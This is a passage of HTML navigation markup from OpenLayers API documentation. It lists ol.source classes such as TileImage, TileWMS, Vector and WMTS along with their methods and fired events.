<li data-name="ol.source.TileDebug#changed" class="unstable">
<a href="ol.source.TileDebug.html#changed">changed</a>
</li>
<li data-name="ol.source.TileDebug#get" class="">
<a href="ol.source.TileDebug.html#get">get</a>
</li>
<li data-name="ol.source.TileDebug#getAttributions" class="">
<a href="ol.source.TileDebug.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileDebug#getKeys" class="">
<a href="ol.source.TileDebug.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileDebug#getLogo" class="">
<a href="ol.source.TileDebug.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileDebug#getProjection" class="unstable">
<a href="ol.source.TileDebug.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileDebug#getProperties" class="">
<a href="ol.source.TileDebug.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileDebug#getRevision" class="unstable">
<a href="ol.source.TileDebug.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileDebug#getState" class="unstable">
<a href="ol.source.TileDebug.html#getState">getState</a>
</li>
<li data-name="ol.source.TileDebug#getTileGrid" class="">
<a href="ol.source.TileDebug.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileDebug#on" class="">
<a href="ol.source.TileDebug.html#on">on</a>
</li>
<li data-name="ol.source.TileDebug#once" class="">
<a href="ol.source.TileDebug.html#once">once</a>
</li>
<li data-name="ol.source.TileDebug#set" class="">
<a href="ol.source.TileDebug.html#set">set</a>
</li>
<li data-name="ol.source.TileDebug#setProperties" class="">
<a href="ol.source.TileDebug.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileDebug#un" class="">
<a href="ol.source.TileDebug.html#un">un</a>
</li>
<li data-name="ol.source.TileDebug#unByKey" class="">
<a href="ol.source.TileDebug.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileDebug#unset" class="">
<a href="ol.source.TileDebug.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileEvent">
<span class="title">
<a href="ol.source.TileEvent.html">ol.source.TileEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.source.TileEvent#tile"><a href="ol.source.TileEvent.html#tile">tile</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.source.TileImage">
<span class="title">
<a href="ol.source.TileImage.html">ol.source.TileImage</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileImage#changed" class="unstable">
<a href="ol.source.TileImage.html#changed">changed</a>
</li>
<li data-name="ol.source.TileImage#get" class="">
<a href="ol.source.TileImage.html#get">get</a>
</li>
<li data-name="ol.source.TileImage#getAttributions" class="">
<a href="ol.source.TileImage.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileImage#getKeys" class="">
<a href="ol.source.TileImage.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileImage#getLogo" class="">
<a href="ol.source.TileImage.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileImage#getProjection" class="unstable">
<a href="ol.source.TileImage.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileImage#getProperties" class="">
<a href="ol.source.TileImage.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileImage#getRevision" class="unstable">
<a href="ol.source.TileImage.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileImage#getState" class="unstable">
<a href="ol.source.TileImage.html#getState">getState</a>
</li>
<li data-name="ol.source.TileImage#getTileGrid" class="">
<a href="ol.source.TileImage.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileImage#getTileLoadFunction" class="unstable">
<a href="ol.source.TileImage.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.TileImage#getTileUrlFunction" class="unstable">
<a href="ol.source.TileImage.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.TileImage#on" class="">
<a href="ol.source.TileImage.html#on">on</a>
</li>
<li data-name="ol.source.TileImage#once" class="">
<a href="ol.source.TileImage.html#once">once</a>
</li>
<li data-name="ol.source.TileImage#set" class="">
<a href="ol.source.TileImage.html#set">set</a>
</li>
<li data-name="ol.source.TileImage#setProperties" class="">
<a href="ol.source.TileImage.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileImage#setTileLoadFunction" class="unstable">
<a href="ol.source.TileImage.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.TileImage#setTileUrlFunction" class="unstable">
<a href="ol.source.TileImage.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.TileImage#un" class="">
<a href="ol.source.TileImage.html#un">un</a>
</li>
<li data-name="ol.source.TileImage#unByKey" class="">
<a href="ol.source.TileImage.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileImage#unset" class="">
<a href="ol.source.TileImage.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileJSON">
<span class="title">
<a href="ol.source.TileJSON.html">ol.source.TileJSON</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileJSON#changed" class="unstable">
<a href="ol.source.TileJSON.html#changed">changed</a>
</li>
<li data-name="ol.source.TileJSON#get" class="">
<a href="ol.source.TileJSON.html#get">get</a>
</li>
<li data-name="ol.source.TileJSON#getAttributions" class="">
<a href="ol.source.TileJSON.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileJSON#getKeys" class="">
<a href="ol.source.TileJSON.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileJSON#getLogo" class="">
<a href="ol.source.TileJSON.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileJSON#getProjection" class="unstable">
<a href="ol.source.TileJSON.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileJSON#getProperties" class="">
<a href="ol.source.TileJSON.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileJSON#getRevision" class="unstable">
<a href="ol.source.TileJSON.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileJSON#getState" class="unstable">
<a href="ol.source.TileJSON.html#getState">getState</a>
</li>
<li data-name="ol.source.TileJSON#getTileGrid" class="">
<a href="ol.source.TileJSON.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileJSON#getTileLoadFunction" class="unstable">
<a href="ol.source.TileJSON.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.TileJSON#getTileUrlFunction" class="unstable">
<a href="ol.source.TileJSON.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.TileJSON#on" class="">
<a href="ol.source.TileJSON.html#on">on</a>
</li>
<li data-name="ol.source.TileJSON#once" class="">
<a href="ol.source.TileJSON.html#once">once</a>
</li>
<li data-name="ol.source.TileJSON#set" class="">
<a href="ol.source.TileJSON.html#set">set</a>
</li>
<li data-name="ol.source.TileJSON#setProperties" class="">
<a href="ol.source.TileJSON.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileJSON#setTileLoadFunction" class="unstable">
<a href="ol.source.TileJSON.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.TileJSON#setTileUrlFunction" class="unstable">
<a href="ol.source.TileJSON.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.TileJSON#un" class="">
<a href="ol.source.TileJSON.html#un">un</a>
</li>
<li data-name="ol.source.TileJSON#unByKey" class="">
<a href="ol.source.TileJSON.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileJSON#unset" class="">
<a href="ol.source.TileJSON.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileUTFGrid">
<span class="title">
<a href="ol.source.TileUTFGrid.html">ol.source.TileUTFGrid</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileUTFGrid#changed" class="unstable">
<a href="ol.source.TileUTFGrid.html#changed">changed</a>
</li>
<li data-name="ol.source.TileUTFGrid#forDataAtCoordinateAndResolution" class="unstable">
<a href="ol.source.TileUTFGrid.html#forDataAtCoordinateAndResolution">forDataAtCoordinateAndResolution</a>
</li>
<li data-name="ol.source.TileUTFGrid#get" class="">
<a href="ol.source.TileUTFGrid.html#get">get</a>
</li>
<li data-name="ol.source.TileUTFGrid#getAttributions" class="">
<a href="ol.source.TileUTFGrid.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileUTFGrid#getKeys" class="">
<a href="ol.source.TileUTFGrid.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileUTFGrid#getLogo" class="">
<a href="ol.source.TileUTFGrid.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileUTFGrid#getProjection" class="unstable">
<a href="ol.source.TileUTFGrid.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileUTFGrid#getProperties" class="">
<a href="ol.source.TileUTFGrid.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileUTFGrid#getRevision" class="unstable">
<a href="ol.source.TileUTFGrid.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileUTFGrid#getState" class="unstable">
<a href="ol.source.TileUTFGrid.html#getState">getState</a>
</li>
<li data-name="ol.source.TileUTFGrid#getTemplate" class="unstable">
<a href="ol.source.TileUTFGrid.html#getTemplate">getTemplate</a>
</li>
<li data-name="ol.source.TileUTFGrid#getTileGrid" class="">
<a href="ol.source.TileUTFGrid.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileUTFGrid#on" class="">
<a href="ol.source.TileUTFGrid.html#on">on</a>
</li>
<li data-name="ol.source.TileUTFGrid#once" class="">
<a href="ol.source.TileUTFGrid.html#once">once</a>
</li>
<li data-name="ol.source.TileUTFGrid#set" class="">
<a href="ol.source.TileUTFGrid.html#set">set</a>
</li>
<li data-name="ol.source.TileUTFGrid#setProperties" class="">
<a href="ol.source.TileUTFGrid.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileUTFGrid#un" class="">
<a href="ol.source.TileUTFGrid.html#un">un</a>
</li>
<li data-name="ol.source.TileUTFGrid#unByKey" class="">
<a href="ol.source.TileUTFGrid.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileUTFGrid#unset" class="">
<a href="ol.source.TileUTFGrid.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileVector">
<span class="title">
<a href="ol.source.TileVector.html">ol.source.TileVector</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileVector#addFeature" class="">
<a href="ol.source.TileVector.html#addFeature">addFeature</a>
</li>
<li data-name="ol.source.TileVector#addFeatures" class="">
<a href="ol.source.TileVector.html#addFeatures">addFeatures</a>
</li>
<li data-name="ol.source.TileVector#changed" class="unstable">
<a href="ol.source.TileVector.html#changed">changed</a>
</li>
<li data-name="ol.source.TileVector#clear" class="">
<a href="ol.source.TileVector.html#clear">clear</a>
</li>
<li data-name="ol.source.TileVector#forEachFeature" class="">
<a href="ol.source.TileVector.html#forEachFeature">forEachFeature</a>
</li>
<li data-name="ol.source.TileVector#forEachFeatureInExtent" class="unstable">
<a href="ol.source.TileVector.html#forEachFeatureInExtent">forEachFeatureInExtent</a>
</li>
<li data-name="ol.source.TileVector#forEachFeatureIntersectingExtent" class="unstable">
<a href="ol.source.TileVector.html#forEachFeatureIntersectingExtent">forEachFeatureIntersectingExtent</a>
</li>
<li data-name="ol.source.TileVector#get" class="">
<a href="ol.source.TileVector.html#get">get</a>
</li>
<li data-name="ol.source.TileVector#getAttributions" class="">
<a href="ol.source.TileVector.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileVector#getClosestFeatureToCoordinate" class="">
<a href="ol.source.TileVector.html#getClosestFeatureToCoordinate">getClosestFeatureToCoordinate</a>
</li>
<li data-name="ol.source.TileVector#getExtent" class="">
<a href="ol.source.TileVector.html#getExtent">getExtent</a>
</li>
<li data-name="ol.source.TileVector#getFeatureById" class="">
<a href="ol.source.TileVector.html#getFeatureById">getFeatureById</a>
</li>
<li data-name="ol.source.TileVector#getFeatures" class="">
<a href="ol.source.TileVector.html#getFeatures">getFeatures</a>
</li>
<li data-name="ol.source.TileVector#getFeaturesAtCoordinate" class="">
<a href="ol.source.TileVector.html#getFeaturesAtCoordinate">getFeaturesAtCoordinate</a>
</li>
<li data-name="ol.source.TileVector#getFeaturesAtCoordinateAndResolution" class="unstable">
<a href="ol.source.TileVector.html#getFeaturesAtCoordinateAndResolution">getFeaturesAtCoordinateAndResolution</a>
</li>
<li data-name="ol.source.TileVector#getFeaturesCollection" class="unstable">
<a href="ol.source.TileVector.html#getFeaturesCollection">getFeaturesCollection</a>
</li>
<li data-name="ol.source.TileVector#getFeaturesInExtent" class="unstable">
<a href="ol.source.TileVector.html#getFeaturesInExtent">getFeaturesInExtent</a>
</li>
<li data-name="ol.source.TileVector#getKeys" class="">
<a href="ol.source.TileVector.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileVector#getLogo" class="">
<a href="ol.source.TileVector.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileVector#getProjection" class="unstable">
<a href="ol.source.TileVector.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileVector#getProperties" class="">
<a href="ol.source.TileVector.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileVector#getRevision" class="unstable">
<a href="ol.source.TileVector.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileVector#getState" class="unstable">
<a href="ol.source.TileVector.html#getState">getState</a>
</li>
<li data-name="ol.source.TileVector#on" class="">
<a href="ol.source.TileVector.html#on">on</a>
</li>
<li data-name="ol.source.TileVector#once" class="">
<a href="ol.source.TileVector.html#once">once</a>
</li>
<li data-name="ol.source.TileVector#removeFeature" class="">
<a href="ol.source.TileVector.html#removeFeature">removeFeature</a>
</li>
<li data-name="ol.source.TileVector#set" class="">
<a href="ol.source.TileVector.html#set">set</a>
</li>
<li data-name="ol.source.TileVector#setProperties" class="">
<a href="ol.source.TileVector.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileVector#un" class="">
<a href="ol.source.TileVector.html#un">un</a>
</li>
<li data-name="ol.source.TileVector#unByKey" class="">
<a href="ol.source.TileVector.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileVector#unset" class="">
<a href="ol.source.TileVector.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.source.VectorEvent#event:addfeature" class="">
<a href="ol.source.VectorEvent.html#event:addfeature">addfeature</a>
</li>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.source.VectorEvent#event:changefeature" class="unstable">
<a href="ol.source.VectorEvent.html#event:changefeature">changefeature</a>
</li>
<li data-name="ol.source.VectorEvent#event:clear" class="unstable">
<a href="ol.source.VectorEvent.html#event:clear">clear</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.VectorEvent#event:removefeature" class="">
<a href="ol.source.VectorEvent.html#event:removefeature">removefeature</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileWMS">
<span class="title">
<a href="ol.source.TileWMS.html">ol.source.TileWMS</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileWMS#changed" class="unstable">
<a href="ol.source.TileWMS.html#changed">changed</a>
</li>
<li data-name="ol.source.TileWMS#get" class="">
<a href="ol.source.TileWMS.html#get">get</a>
</li>
<li data-name="ol.source.TileWMS#getAttributions" class="">
<a href="ol.source.TileWMS.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileWMS#getGetFeatureInfoUrl" class="">
<a href="ol.source.TileWMS.html#getGetFeatureInfoUrl">getGetFeatureInfoUrl</a>
</li>
<li data-name="ol.source.TileWMS#getKeys" class="">
<a href="ol.source.TileWMS.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileWMS#getLogo" class="">
<a href="ol.source.TileWMS.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileWMS#getParams" class="">
<a href="ol.source.TileWMS.html#getParams">getParams</a>
</li>
<li data-name="ol.source.TileWMS#getProjection" class="unstable">
<a href="ol.source.TileWMS.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileWMS#getProperties" class="">
<a href="ol.source.TileWMS.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileWMS#getRevision" class="unstable">
<a href="ol.source.TileWMS.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileWMS#getState" class="unstable">
<a href="ol.source.TileWMS.html#getState">getState</a>
</li>
<li data-name="ol.source.TileWMS#getTileGrid" class="">
<a href="ol.source.TileWMS.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileWMS#getTileLoadFunction" class="unstable">
<a href="ol.source.TileWMS.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.TileWMS#getTileUrlFunction" class="unstable">
<a href="ol.source.TileWMS.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.TileWMS#getUrls" class="">
<a href="ol.source.TileWMS.html#getUrls">getUrls</a>
</li>
<li data-name="ol.source.TileWMS#on" class="">
<a href="ol.source.TileWMS.html#on">on</a>
</li>
<li data-name="ol.source.TileWMS#once" class="">
<a href="ol.source.TileWMS.html#once">once</a>
</li>
<li data-name="ol.source.TileWMS#set" class="">
<a href="ol.source.TileWMS.html#set">set</a>
</li>
<li data-name="ol.source.TileWMS#setProperties" class="">
<a href="ol.source.TileWMS.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileWMS#setTileLoadFunction" class="unstable">
<a href="ol.source.TileWMS.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.TileWMS#setTileUrlFunction" class="unstable">
<a href="ol.source.TileWMS.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.TileWMS#setUrl" class="">
<a href="ol.source.TileWMS.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.TileWMS#setUrls" class="">
<a href="ol.source.TileWMS.html#setUrls">setUrls</a>
</li>
<li data-name="ol.source.TileWMS#un" class="">
<a href="ol.source.TileWMS.html#un">un</a>
</li>
<li data-name="ol.source.TileWMS#unByKey" class="">
<a href="ol.source.TileWMS.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileWMS#unset" class="">
<a href="ol.source.TileWMS.html#unset">unset</a>
</li>
<li data-name="ol.source.TileWMS#updateParams" class="">
<a href="ol.source.TileWMS.html#updateParams">updateParams</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Vector">
<span class="title">
<a href="ol.source.Vector.html">ol.source.Vector</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Vector#addFeature" class="">
<a href="ol.source.Vector.html#addFeature">addFeature</a>
</li>
<li data-name="ol.source.Vector#addFeatures" class="">
<a href="ol.source.Vector.html#addFeatures">addFeatures</a>
</li>
<li data-name="ol.source.Vector#changed" class="unstable">
<a href="ol.source.Vector.html#changed">changed</a>
</li>
<li data-name="ol.source.Vector#clear" class="">
<a href="ol.source.Vector.html#clear">clear</a>
</li>
<li data-name="ol.source.Vector#forEachFeature" class="">
<a href="ol.source.Vector.html#forEachFeature">forEachFeature</a>
</li>
<li data-name="ol.source.Vector#forEachFeatureInExtent" class="unstable">
<a href="ol.source.Vector.html#forEachFeatureInExtent">forEachFeatureInExtent</a>
</li>
<li data-name="ol.source.Vector#forEachFeatureIntersectingExtent" class="unstable">
<a href="ol.source.Vector.html#forEachFeatureIntersectingExtent">forEachFeatureIntersectingExtent</a>
</li>
<li data-name="ol.source.Vector#get" class="">
<a href="ol.source.Vector.html#get">get</a>
</li>
<li data-name="ol.source.Vector#getAttributions" class="">
<a href="ol.source.Vector.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Vector#getClosestFeatureToCoordinate" class="">
<a href="ol.source.Vector.html#getClosestFeatureToCoordinate">getClosestFeatureToCoordinate</a>
</li>
<li data-name="ol.source.Vector#getExtent" class="">
<a href="ol.source.Vector.html#getExtent">getExtent</a>
</li>
<li data-name="ol.source.Vector#getFeatureById" class="">
<a href="ol.source.Vector.html#getFeatureById">getFeatureById</a>
</li>
<li data-name="ol.source.Vector#getFeatures" class="">
<a href="ol.source.Vector.html#getFeatures">getFeatures</a>
</li>
<li data-name="ol.source.Vector#getFeaturesAtCoordinate" class="">
<a href="ol.source.Vector.html#getFeaturesAtCoordinate">getFeaturesAtCoordinate</a>
</li>
<li data-name="ol.source.Vector#getFeaturesCollection" class="unstable">
<a href="ol.source.Vector.html#getFeaturesCollection">getFeaturesCollection</a>
</li>
<li data-name="ol.source.Vector#getFeaturesInExtent" class="unstable">
<a href="ol.source.Vector.html#getFeaturesInExtent">getFeaturesInExtent</a>
</li>
<li data-name="ol.source.Vector#getKeys" class="">
<a href="ol.source.Vector.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Vector#getLogo" class="">
<a href="ol.source.Vector.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Vector#getProjection" class="unstable">
<a href="ol.source.Vector.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Vector#getProperties" class="">
<a href="ol.source.Vector.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Vector#getRevision" class="unstable">
<a href="ol.source.Vector.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Vector#getState" class="unstable">
<a href="ol.source.Vector.html#getState">getState</a>
</li>
<li data-name="ol.source.Vector#on" class="">
<a href="ol.source.Vector.html#on">on</a>
</li>
<li data-name="ol.source.Vector#once" class="">
<a href="ol.source.Vector.html#once">once</a>
</li>
<li data-name="ol.source.Vector#removeFeature" class="">
<a href="ol.source.Vector.html#removeFeature">removeFeature</a>
</li>
<li data-name="ol.source.Vector#set" class="">
<a href="ol.source.Vector.html#set">set</a>
</li>
<li data-name="ol.source.Vector#setProperties" class="">
<a href="ol.source.Vector.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Vector#un" class="">
<a href="ol.source.Vector.html#un">un</a>
</li>
<li data-name="ol.source.Vector#unByKey" class="">
<a href="ol.source.Vector.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Vector#unset" class="">
<a href="ol.source.Vector.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.source.VectorEvent#event:addfeature" class="">
<a href="ol.source.VectorEvent.html#event:addfeature">addfeature</a>
</li>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.source.VectorEvent#event:changefeature" class="unstable">
<a href="ol.source.VectorEvent.html#event:changefeature">changefeature</a>
</li>
<li data-name="ol.source.VectorEvent#event:clear" class="unstable">
<a href="ol.source.VectorEvent.html#event:clear">clear</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.VectorEvent#event:removefeature" class="">
<a href="ol.source.VectorEvent.html#event:removefeature">removefeature</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.VectorEvent">
<span class="title">
<a href="ol.source.VectorEvent.html">ol.source.VectorEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.source.VectorEvent#feature"><a href="ol.source.VectorEvent.html#feature">feature</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.source.WMTS">
<span class="title">
<a href="ol.source.WMTS.html">ol.source.WMTS</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.WMTS.optionsFromCapabilities" class="unstable">
<a href="ol.source.WMTS.html#optionsFromCapabilities">optionsFromCapabilities</a>
</li>
<li data-name="ol.source.WMTS#changed" class="unstable">
<a href="ol.source.WMTS.html#changed">changed</a>
</li>
<li data-name="ol.source.WMTS#get" class="">
<a href="ol.source.WMTS.html#get">get</a>
</li>
<li data-name="ol.source.WMTS#getAttributions" class="">
<a href="ol.source.WMTS.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.WMTS#getDimensions" class="unstable">
<a href="ol.source.WMTS.html#getDimensions">getDimensions</a>
</li>
<li data-name="ol.source.WMTS#getFormat" class="unstable">
<a href="ol.source.WMTS.html#getFormat">getFormat</a>
</li>
<li data-name="ol.source.WMTS#getKeys" class="">
<a href="ol.source.WMTS.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.WMTS#getLayer" class="unstable">
<a href="ol.source.WMTS.html#getLayer">getLayer</a>
</li>
<li data-name="ol.source.WMTS#getLogo" class="">
<a href="ol.source.WMTS.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.WMTS#getMatrixSet" class="unstable">
<a href="ol.source.WMTS.html#getMatrixSet">getMatrixSet</a>
</li>
<li data-name="ol.source.WMTS#getProjection" class="unstable">
<a href="ol.source.WMTS.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.WMTS#getProperties" class="">
<a href="ol.source.WMTS.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.WMTS#getRequestEncoding" class="unstable">
<a href="ol.source.WMTS.html#getRequestEncoding">getRequestEncoding</a>
</li>
<li data-name="ol.source.WMTS#getRevision" class="unstable">
<a href="ol.source.WMTS.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.WMTS#getState" class="unstable">
<a href="ol.source.WMTS.html#getState">getState</a>
</li>
<li data-name="ol.source.WMTS#getStyle" class="unstable">
<a href="ol.source.WMTS.html#getStyle">getStyle</a>
</li>
<li data-name="ol.source.WMTS#getTileGrid" class="">
<a href="ol.source.WMTS.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.WMTS#getTileLoadFunction" class="unstable">
<a href="ol.source.WMTS.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.WMTS#getTileUrlFunction" class="unstable">
<a href="ol.source.WMTS.html#getTileUrlFunction">getTileUrlFunction</a>
